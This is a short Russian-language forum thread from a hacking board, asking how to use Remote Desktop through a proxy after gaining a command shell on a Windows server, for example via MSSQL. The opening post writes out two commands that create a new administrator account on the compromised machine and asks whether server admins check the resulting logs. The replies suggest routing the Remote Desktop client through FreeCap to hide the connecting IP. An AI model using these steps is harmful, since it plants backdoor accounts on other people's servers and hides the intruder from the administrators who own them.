Remote Desktop через прокси

Discussion in 'Безопасность и Анонимность' started by vmn, 13 Jan 2007.

  1. vmn

    vmn Elder - Старейшина

    Joined:
    16 Oct 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Довольно часто удается получить доступ к cmd шеллу в виндовсе(например через mssql). Если прав хватает, то легко создать нового администратора:
    net user admin 12345 /add
    net localgroup administrators admin /add

    Если под этим пользователем логиниться через Remote Desktop то остатся логи? При обнаружении этого пользователя адмbнами сервера их обычно смотрят?
    Можно ли как-нибудь подменить свой ip в таком случае.
     
    #1 vmn, 13 Jan 2007
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    543
    Likes Received:
    274
    Reputations:
    51
    Логи конечно остаются...
    Попробуй через FreeCap, добавь туда %WINDOWS%\system32\mstsc.exe
    Должно работать, хотя сам не пробывал... :)
     
    #2 aka PSIH, 13 Jan 2007
  3. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    да сделай так как сказал Psih прога должна будут перехватить пакеты и перенаправить их через прокси
     
    #3 W!z@rD, 13 Jan 2007
(You must log in or sign up to post here.)